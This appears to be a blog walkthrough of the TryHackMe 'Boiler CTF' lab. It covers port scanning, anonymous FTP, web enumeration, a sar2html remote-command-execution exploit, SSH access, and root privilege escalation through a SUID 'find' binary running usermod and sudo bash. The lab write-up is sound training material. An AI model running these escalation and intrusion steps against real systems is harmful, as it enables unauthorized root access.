BoilerCTF - TryHackMe Walkthrough
Intermediate level CTF. Just enumerate, you’ll get there. This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.
URL: Boiler CTF
This article will primarily be focusing on owning the system, and less focus on answering the questions presented by the challenge. However, most of the answers are found when doing so anyway.
We are given the IP 10.10.0.15. Run an nmap scan with the following command:
nmap -p- -A -o portscan 10.10.0.15
I initially got a host down message so I adjusted my nmap command to the following:
nmap -p- -A -Pn -o portscan 10.10.208.159
These are the open ports:
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.9.6.63 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 10000/tcp open http MiniServ 1.930 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). 55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA) | 256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA) |_ 256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)
I’d like to explore the FTP server as Anonymous login is allowed. This is always a terrible way to have your FTP server configured as it allows anyone to log in with the default credentials:
ftp 10.10.208.159 Anonymous
There is a hidden file:
Let’s transfer this over to our local machine
The file seems to contain an encrypted message:
This seems like a simple letter substitution cypher like Caeser Cypher or Rot 13. I used an online rot13 decryptor:
This seems like a rabbit hole. Let’s move onto enumerating the next port.
I’ll open up port 80 on my browser:
This looks like the standard apache2 page. Let’s run a dirb scan to find any hidden paths:
We’ve got a couple of interesting results: Robots.txt and Joomla. Joomla is a CMS which may be able to provide us with an attack surface.
Let’s investigate the robots.txt file:
Some of these are most likely rabbit holes by the looks of it. It’s important to always explore every path.
All the disallowed paths give a 404 not found error.
A closer look at the following code:
079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075
This is ASCII, you can convert to base64, md5 but again it’s another rabbit hole.
Here is the /joomla repository:
I want to run a dirb scan on this url to find more information:
There are a few rabbit holes again:
This is a Caeser Cypher, using a key of 2:
Just messing around.
Here we are presented with a sar2html tool. I searched this up online and found an exploit.
Here is an exploitDB page on an RCE exploit:
We can execute our own command using the URL:
Then “press “select # host” then your command’s output will appear bottom side of the scroll screen.”
I have entered “id” into the url:
The RCE has been proven to work. There is a file called log.txt. Executing this URL will show the contents of log.txt:
This has given us a username and password (censored). Let’s use this to connect by SSH. As we identified earlier, the port 55007 is open for SSH so we need to specify this port when connecting via SSH:
ssh [email protected] -p 55007
Upgrade the shell with the following command:
python -c 'import pty; pty.spawn("/bin/bash")'
There is a script in the current directory called backup.sh:
There are credentials for the user “stoner” in plain text.
Let’s change to this user:
su stoner [censored]
We have some hidden files in stoners home directory /home/stoner:
The .nano is empty and .secret is the user.txt file. I spent a while looking for an actual file called user.txt but turns out it’s this.
Let’s check sudo rights:
User stoner may run the following commands on Vulnerable: (root) NOPASSWD: /NotThisTime/MessinWithYa
No that helpful as this path doesn’t exist and we don’t have permission to create this directory.
The next method I usually go for is finding any interesting SUID binaries. This is a great article about SUID Binaries:
Here is the following command to list all SUID binaries on the system:
find / -user root -perm -4000 -print 2>/dev/null
I understand that “/usr/bin/find” can be exploited.
Privilege Escalation Using Find SUID Binary
The exploitation of this binary is quite straight forward. We can use the command “find” with sudo rights. Let’s create a dummy file called cybergoat.txt in stoners home directory:
And let’s use the following command to “find” that file and execute our own command:
find raj -exec "whoami" \;
That’s great, we have successfully executed whoami as root. The following command adds a user to the Sudo Group on Linux:
usermod -aG sudo [user]
So let’s add that into the find command:
find cybergoat.txt -exec usermod -aG sudo stoner \; su stoner
As you can see, we can execute any command as sudo. Now we can get a root shell and find the last flag:
sudo /bin/bash cd /root cat root.txt